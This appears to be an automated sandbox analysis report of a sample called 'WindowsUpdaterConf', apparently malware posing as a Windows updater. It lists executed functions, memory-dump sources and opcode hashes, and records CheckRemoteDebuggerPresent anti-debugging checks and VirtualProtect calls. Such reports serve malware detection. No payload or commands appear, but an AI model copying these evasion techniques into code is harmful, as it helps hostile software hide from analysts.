                                                                                          execution_graph 5075 6242c50 5076 6242c6e 5075->5076 5079 6242dd0 5076->5079 5083 6242e02 5079->5083 5086 6242e08 5079->5086 5080 6242cbb 5084 6242e4c CheckRemoteDebuggerPresent 5083->5084 5085 6242e8e 5084->5085 5085->5080 5087 6242e4c CheckRemoteDebuggerPresent 5086->5087 5088 6242e8e 5087->5088 5088->5080 5071 3288b40 5072 3288b80 CloseHandle 5071->5072 5074 3288bb1 5072->5074 5089 3280850 5090 3280859 5089->5090 5093 32834bd 5089->5093 5096 3283be2 5089->5096 5099 32888c0 5093->5099 5098 32888c0 VirtualProtect 5096->5098 5097 3283bf8 5098->5097 5101 32888d3 5099->5101 5103 3288970 5101->5103 5104 32889b8 VirtualProtect 5103->5104 5106 32834d6 5104->5106

                                                                                          Executed Functions

                                                                                          Function 06308C18 Relevance: 11.3, Strings: 7, Instructions: 2546COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 0 6308c18-6308c83 call 6300040 call 630bf28 6 6308c89-630bec4 0->6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000025.00000002.3130182739.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_37_2_6300000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: %1K$(K1$9Gxv$9Gxv$=<R3${u(F$C\
                                                                                          • API String ID: 0-857792947
                                                                                          • Opcode ID: 1343181a39eabb590d3a86ee6ca5a1392612561afd076a4fd272c544922c7fb4
                                                                                          • Instruction ID: 49e1cc433e6dde589c128becb843d63e2f165b84d7f7ba5052b598e8c36db7f0
                                                                                          • Opcode Fuzzy Hash: 1343181a39eabb590d3a86ee6ca5a1392612561afd076a4fd272c544922c7fb4
                                                                                          • Instruction Fuzzy Hash: 1F532E38A012198FCB55DF28C9A469EB7F6FB98305F508199D91EE7384EB349E81CF41
                                                                                          Function 06242E02 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 767 6242e02-6242e8c CheckRemoteDebuggerPresent 769 6242e95-6242ed0 767->769 770 6242e8e-6242e94 767->770 770->769
                                                                                          APIs
                                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 06242E7F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000025.00000002.3129599130.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_37_2_6240000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID: CheckDebuggerPresentRemote
                                                                                          • String ID:
                                                                                          • API String ID: 3662101638-0
                                                                                          • Opcode ID: 5cc7a23c4a9e430191470a773d8f915d520c699351cbd674f36ee67b4c86a152
                                                                                          • Instruction ID: dadfd1046044f2c4383c9697afbf49a0acce2dbba30c94dcf95452b78c817657
                                                                                          • Opcode Fuzzy Hash: 5cc7a23c4a9e430191470a773d8f915d520c699351cbd674f36ee67b4c86a152
                                                                                          • Instruction Fuzzy Hash: 48214AB1D01259CFCB10CFAAD884BEEBBF4AF58310F14845AE859A7341D778A944CF60
                                                                                          Function 06242E08 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 773 6242e08-6242e8c CheckRemoteDebuggerPresent 775 6242e95-6242ed0 773->775 776 6242e8e-6242e94 773->776 776->775
                                                                                          APIs
                                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 06242E7F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000025.00000002.3129599130.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_37_2_6240000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID: CheckDebuggerPresentRemote
                                                                                          • String ID:
                                                                                          • API String ID: 3662101638-0
                                                                                          • Opcode ID: 06e69253be3831b776e52fe0645129dad082876987bba86da6043e82e55866f7
                                                                                          • Instruction ID: 193f5412065e4d9bba8f067d3effa0bd63e29f6801b277ab3dad78446aaadd0b
                                                                                          • Opcode Fuzzy Hash: 06e69253be3831b776e52fe0645129dad082876987bba86da6043e82e55866f7
                                                                                          • Instruction Fuzzy Hash: 5F2128B1D01259CFCB14CF9AD884BEEBBF4AF58320F14845AE859A7250D778A944CF61
                                                                                          Function 0630BF50 Relevance: 1.5, Strings: 1, Instructions: 232COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1012 630bf50-630bf74 1013 630bf76-630bfd4 1012->1013 1014 630bfdc-630bfe3 1012->1014 1013->1014 1015 630bfe5-630c019 1014->1015 1016 630c056-630c067 1014->1016 1023 630c021-630c04a 1015->1023 1017 630c069 1016->1017 1018 630c06e-630c090 1016->1018 1017->1018 1026 630c092-630c09b 1018->1026 1027 630c0ff-630c194 call 6307550 1018->1027 1050 630c1fc-630c24e 1023->1050 1052 630c050 1023->1052 1029 630c0aa-630c0b0 1026->1029 1030 630c09d-630c0a2 1026->1030 1043 630c1b5-630c1bb 1027->1043 1034 630c1b0 1029->1034 1035 630c0b6-630c0ba 1029->1035 1030->1029 1034->1043 1035->1027 1038 630c0bc-630c0c5 1035->1038 1040 630c0d4-630c0da 1038->1040 1041 630c0c7-630c0cc 1038->1041 1040->1034 1045 630c0e0-630c0fa 1040->1045 1041->1040 1046 630c1c5 1043->1046 1047 630c1bd 1043->1047 1045->1043 1046->1050 1047->1046 1060 630c250-630c256 1050->1060 1052->1016 1061 630dfda-630dfde 1060->1061 1062 630c25c 1060->1062 1064 630dfe4-630dfef 1061->1064 1065 630ec87-630eca0 1061->1065 1062->1061 1064->1060 1070 630eca2-630eca7 1065->1070 1071 630ec7e-630ec84 1065->1071 1071->1065
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000025.00000002.3130182739.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_37_2_6300000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Dmq
                                                                                          • API String ID: 0-4031372824
                                                                                          • Opcode ID: 8c8c4adf09e216c32a76b5ad38fa4b71d9d821ecb4f11e6ed1d7d5a5a9fe68eb
                                                                                          • Instruction ID: 05483c186bb06f177c195e329945ac402296773eb765b55b4b76d06f0dfbcdf4
                                                                                          • Opcode Fuzzy Hash: 8c8c4adf09e216c32a76b5ad38fa4b71d9d821ecb4f11e6ed1d7d5a5a9fe68eb
                                                                                          • Instruction Fuzzy Hash: 0F91E274A002008FDB58DF68C590A6ABBFAFF89310F11966AD4159B3A1CB35EC45CFD1
                                                                                          Function 0630FC10 Relevance: .2, Instructions: 166COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000025.00000002.3130182739.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_37_2_6300000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 20823f2359eb9812ee2f4cb25aee828b45b1bbaf920c9ecbe57d4f48108a8388
                                                                                          • Instruction ID: 171973292f86a4cbba921788562fa716bfcbcf51ebec451f1f4451e907a714e5
                                                                                          • Opcode Fuzzy Hash: 20823f2359eb9812ee2f4cb25aee828b45b1bbaf920c9ecbe57d4f48108a8388
                                                                                          • Instruction Fuzzy Hash: A9513B387002448BE758AB64E4A8B7EB7EEEB9C705F109529D906D73C8DF398C45CB91
                                                                                          Function 06307B70 Relevance: .1, Instructions: 84COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000025.00000002.3130182739.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_37_2_6300000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b8594d46dce842dafb8fb3a67f814d9a30b7ef167b0407027a64659cfd939ebb
                                                                                          • Instruction ID: d74ea13b2de57a950bb28cd41005bf650a66ae93b34e31245318184268596b14
                                                                                          • Opcode Fuzzy Hash: b8594d46dce842dafb8fb3a67f814d9a30b7ef167b0407027a64659cfd939ebb
                                                                                          • Instruction Fuzzy Hash: 6B314B386003058FD309AF68E1A476E77BEFBA9708F50502AD9169B388DF385E45CBD1
                                                                                          Function 0630FB20 Relevance: .0, Instructions: 29COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000025.00000002.3130182739.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_37_2_6300000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3f859edd84beb335cf2dd1a59378dc4b2ab8f73806e6df96212434b02ddd0270
                                                                                          • Instruction ID: 7030177bc8d63c353999008a52f28f7eb924c3f0360431b2c7a8284f4819378a
                                                                                          • Opcode Fuzzy Hash: 3f859edd84beb335cf2dd1a59378dc4b2ab8f73806e6df96212434b02ddd0270
                                                                                          • Instruction Fuzzy Hash: 49F01D347143008BEB68BF24E4B463A33AEFB68B45F40402C8916863D9DB299C48CBD5
                                                                                          Function 06305043 Relevance: .0, Instructions: 16COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000025.00000002.3130182739.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_37_2_6300000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7e49152d35de33eefa2b3e4abac044e8d0b7be69574b41a7a1a3f77d23a7543b
                                                                                          • Instruction ID: bef21fb45656862b34e26b07d5d468050a93a639fb67053eff5fed71f6c32319
                                                                                          • Opcode Fuzzy Hash: 7e49152d35de33eefa2b3e4abac044e8d0b7be69574b41a7a1a3f77d23a7543b
                                                                                          • Instruction Fuzzy Hash: 28E0ED74900218CFD758DF14D9947AD77B9FB48301F0081DAD519A3380DB341E88CF41
                                                                                          Function 0630504F Relevance: .0, Instructions: 16COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000025.00000002.3130182739.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_37_2_6300000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7e49152d35de33eefa2b3e4abac044e8d0b7be69574b41a7a1a3f77d23a7543b
                                                                                          • Instruction ID: bef21fb45656862b34e26b07d5d468050a93a639fb67053eff5fed71f6c32319
                                                                                          • Opcode Fuzzy Hash: 7e49152d35de33eefa2b3e4abac044e8d0b7be69574b41a7a1a3f77d23a7543b
                                                                                          • Instruction Fuzzy Hash: 28E0ED74900218CFD758DF14D9947AD77B9FB48301F0081DAD519A3380DB341E88CF41
                                                                                          Function 06307D28 Relevance: .0, Instructions: 15COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000025.00000002.3130182739.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_37_2_6300000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 85d83120443040cec4cb8c0f1d5c571dcca6ef94423753b43c4f2b84b3dbdd3f
                                                                                          • Instruction ID: b504ca82b02d887d08f91348de2b11ce0f722e592bc22cf792cbf5120f98933f
                                                                                          • Opcode Fuzzy Hash: 85d83120443040cec4cb8c0f1d5c571dcca6ef94423753b43c4f2b84b3dbdd3f
                                                                                          • Instruction Fuzzy Hash: 4AD05E7580420CABCB00EFA0891055E7BF8DB09210B1004A59505D3240EE324A005B81
                                                                                          Function 06305134 Relevance: .0, Instructions: 11COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000025.00000002.3130182739.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_37_2_6300000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 365d4662ca65810c3155f5ffb80876b8566cc7062d1370f5d8c52032471e5c63
                                                                                          • Instruction ID: a31e0879642c0bc07a3de087e66c66f4ceefb9585ab35283f5988819b55105ae
                                                                                          • Opcode Fuzzy Hash: 365d4662ca65810c3155f5ffb80876b8566cc7062d1370f5d8c52032471e5c63
                                                                                          • Instruction Fuzzy Hash: C9D067B4A141148FDBA59F64E8D879C77B1AB48201F1095EA960AE3384DE304E84CF54
                                                                                          Function 0630BF28 Relevance: .0, Instructions: 10COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000025.00000002.3130182739.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_37_2_6300000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
                                                                                          • Instruction ID: 19d07928bc24b9474f7e59cbdd8b8e0d3deed1c7a519eb3c8c8690cf2c067a2b
                                                                                          • Opcode Fuzzy Hash: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
                                                                                          • Instruction Fuzzy Hash: C5C092303082084B8748D69DE851825F3DA9BCC618328C0BDA80DC7352EE23FC038684
                                                                                          Function 063086F0 Relevance: .0, Instructions: 10COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000025.00000002.3130182739.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_37_2_6300000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
                                                                                          • Instruction ID: 19d07928bc24b9474f7e59cbdd8b8e0d3deed1c7a519eb3c8c8690cf2c067a2b
                                                                                          • Opcode Fuzzy Hash: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
                                                                                          • Instruction Fuzzy Hash: C5C092303082084B8748D69DE851825F3DA9BCC618328C0BDA80DC7352EE23FC038684
                                                                                          Function 06308780 Relevance: .0, Instructions: 9COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000025.00000002.3130182739.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_37_2_6300000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 541c563c97912ec696b1f2b4f4fda4100d9bab4f7cda9e31e81c4b80c3f6b66f
                                                                                          • Instruction ID: da2056f1b215378797604cee50029afe0ac8c15ebae7ef6ce30028b3983ea043
                                                                                          • Opcode Fuzzy Hash: 541c563c97912ec696b1f2b4f4fda4100d9bab4f7cda9e31e81c4b80c3f6b66f
                                                                                          • Instruction Fuzzy Hash: 7DC02B3010030847C30A3648E0B066A73CFE3ECB08F400015C10A03384CD202D40CB91
                                                                                          Function 06308760 Relevance: .0, Instructions: 8COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000025.00000002.3130182739.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_37_2_6300000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                          • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                                                                                          • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                          • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                                                                                          Function 06301A64 Relevance: .0, Instructions: 8COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000025.00000002.3130182739.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_37_2_6300000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4a6b5beb7b257a7518076e0a1efa55d9696625db7135a66eaf832c0955a6e698
                                                                                          • Instruction ID: 31ffc1d8908856044cf524389f7711f33b139124f192d399d20a6322410553d7
                                                                                          • Opcode Fuzzy Hash: 4a6b5beb7b257a7518076e0a1efa55d9696625db7135a66eaf832c0955a6e698
                                                                                          • Instruction Fuzzy Hash: 5AC00274A182048FDB655B74A02C35D7BA5AB48341F0006A5A84BC2788DB348A408B55
                                                                                          Function 063076A0 Relevance: .0, Instructions: 8COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000025.00000002.3130182739.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_37_2_6300000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 778481114c374013f58dd504163b08aecaedb20851cd843d8b2e6942ade4442f
                                                                                          • Instruction ID: 4a00f5dc1a4745342057266f99d99f8343528934673bb8150e6a530dc89bb7bf
                                                                                          • Opcode Fuzzy Hash: 778481114c374013f58dd504163b08aecaedb20851cd843d8b2e6942ade4442f
                                                                                          • Instruction Fuzzy Hash: 71C09238250208CFC340DB59D589C10BBE8EF49A2835980D8E50D8B733CB32FC01CA80
                                                                                          Function 063087F0 Relevance: .0, Instructions: 7COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000025.00000002.3130182739.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_37_2_6300000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
                                                                                          • Instruction ID: bde584bcc0a20163e1d20aefd562f14664055d751c7398f878511897cdc0a054
                                                                                          • Opcode Fuzzy Hash: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
                                                                                          • Instruction Fuzzy Hash: DFB012301042084B8100D6C8D841810F39CDB84518314C099980C47302CA23FC038580
                                                                                          Function 06307310 Relevance: .0, Instructions: 6COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000025.00000002.3130182739.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_37_2_6300000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a1babce21274724efa8287aaf6e0cc8d54cb715a11d363b271fa19016c32708c
                                                                                          • Instruction ID: 17b1a5d38795d3e7d94f548e67c7562a63a31787b079201c87deef1e37d1ca41
                                                                                          • Opcode Fuzzy Hash: a1babce21274724efa8287aaf6e0cc8d54cb715a11d363b271fa19016c32708c
                                                                                          • Instruction Fuzzy Hash: 96A02230003B0C82830033B02000020338C8880808B8000F8820C0CA220AB3E8E28088
                                                                                          Function 06307680 Relevance: .0, Instructions: 6COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000025.00000002.3130182739.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_37_2_6300000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 58756deec557ff8e869e861b27ef3ae3bb15c8e6cc8ae61306a013b9f71b47b6
                                                                                          • Instruction ID: a9c53da62c9e914517f85d416c7229f4735d8ed807bdebcb9757652e4e3d8f74
                                                                                          • Opcode Fuzzy Hash: 58756deec557ff8e869e861b27ef3ae3bb15c8e6cc8ae61306a013b9f71b47b6
                                                                                          • Instruction Fuzzy Hash: 74A0243000170CC7C30437707104510735CD70030D7400075D10C005114737D010C550
                                                                                          Function 06307A70 Relevance: .0, Instructions: 5COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000025.00000002.3130182739.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_37_2_6300000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cc53f5542f6cbd0dbc19be969ede8f45e27ff125344104c76433af84d1b591ea
                                                                                          • Instruction ID: 294ba04e15a8e1510f0154c01ba35c6acd312173982bf5236a8dae7ded7f3342
                                                                                          • Opcode Fuzzy Hash: cc53f5542f6cbd0dbc19be969ede8f45e27ff125344104c76433af84d1b591ea
                                                                                          • Instruction Fuzzy Hash: FF90027104860C9F4A516799740966A776CA9455197840191E60D515055A5964108695
                                                                                          Function 06301A17 Relevance: .0, Instructions: 4COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000025.00000002.3130182739.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_37_2_6300000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3c0474390f02ec4967fbbf273e4026cebe46e60c4a897393eaf33d2d95ee410d
                                                                                          • Instruction ID: c16e17e0cebbe8b2e2ae98251850e4c6c8dfba375a2527dd7fb4ed1aa2777c74
                                                                                          • Opcode Fuzzy Hash: 3c0474390f02ec4967fbbf273e4026cebe46e60c4a897393eaf33d2d95ee410d
                                                                                          • Instruction Fuzzy Hash: DEB0113820C2088FE3A88A00CE283AA3222AB80302F0002A0A002A2280CB320C888B80